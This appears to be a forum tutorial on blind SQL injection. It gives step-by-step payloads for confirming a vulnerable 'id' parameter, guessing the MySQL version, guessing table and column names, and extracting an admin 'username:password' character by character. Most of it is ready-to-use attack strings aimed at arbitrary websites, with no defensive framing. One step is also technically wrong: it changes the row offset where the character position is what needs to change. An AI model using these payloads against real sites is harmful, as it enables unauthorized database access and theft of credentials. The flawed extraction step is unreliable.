Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities



Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:


Code:

site.com/index.php?id=1


To find out if it's vulnerable we will undergo a little test.

For that we will add some strings. As everybody knows the number 1 is equal to 1. But not to 2.

Therefore we will compare these two websites:


Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2


If "and 1=1" loads perfectly, but "1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The Mysql Version



This isn't very much of use in this kind of injection, but it might be useful.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find it out do this:


Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4
If one of them is loading without missing any content, it's that version.

(You can do the same with the database name and user)



Step 3 Guessing The Table Names.



As you can see guessing is important in
blind
sqli. That's also needed for the table and it's columns :p

To get the right table you'll have to guess it this way:

Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1
Insert your guessed table in the underlined part. If the website is loading without content missing, then the table exists.



Suppose we've got this:


Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table.



We will now guess the columns in this certain table (example = admin).



Do this:

Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1


This is an example:


Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1


Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns



Note: You can do the same with some tools.

But I prefer to do it manually.



For this we have to put the syntax in ascii and guess it's char.

Note that each time you'll do this, you'll get 1 letter.



Do this:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number


Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website will load with some content missing.

So that means the first number that would load false after a number that would load true, is the right char.



Suppose that it's 85.



The example would be:


Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85


To get the first letter of username:password you'll have to use a asscii table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ascii table) and lookup the "chr".



That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and higher you will have to change the underlined number in the syntax:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)



etc.


You'll notice when you'll get to the end when (number),1 isn't giving any information anymore.



Suppose we've now found that the username:password = UserAdmin:BagelJuice



--



Outro



Thank you very much for reading this tutorial. If there are any
questions, or you feel like I forgot something, please don't mind to
post it here.

Also please report any grammatical errors, as I try to dodge them.



I hope I helped you with this thread